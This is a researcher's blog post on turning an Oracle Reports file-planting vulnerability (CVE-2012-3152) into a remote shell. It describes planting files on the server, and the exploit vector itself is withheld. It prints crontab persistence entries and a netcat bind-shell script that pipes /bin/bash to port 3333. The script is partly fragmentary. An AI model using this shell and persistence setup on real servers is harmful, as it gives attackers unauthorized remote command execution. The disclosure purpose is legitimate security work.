UPDATE: There are actually two CVE-VULNERABILITIES here. CVE-2012-1734 which was discovered using my vulnerability that allows planting of files. Credit goes to the University of Texas at Austin Information Security Office.
Earlier I laid down for a nap (which I call pillow hugging) and my mind was racing. I was thinking about Oracle Reports and what other way I could exploit the vulnerability (CVE-2012-3152) which I discovered back in 2011. Gaining a remote shell was what I was thinking about so I jumped out of bed, grabbed a cup of coffee and lit a cigarette up and went to work.
I spent the entire day on this project partly because I found Oracle Linux’s version of netcat to not include the -e option which allows you to pipe a program into it such as /bin/sh. I did some research and found a way to make it work.
At this time, I am not publishing the exploit vector.
I planted 3 files on the server
- A crontab file
- My shell script to run netcat and pipe /bin/sh into it
- .bashrc in /home/oracle
*,1 * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
*,1 * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
Netcat Shell Script
mycommand=`mkfifo ._$myvar; nc -lk 3333 0<._$myvar | /bin/bash &>._$myvar;`
netstat -nat|grep 3333
if [[ $? -eq 0 ]] ;
echo “shell already started”
sh $mycommand &
# Source global definitions
if [ -f /etc/bashrc ]; then
# User specific aliases and functions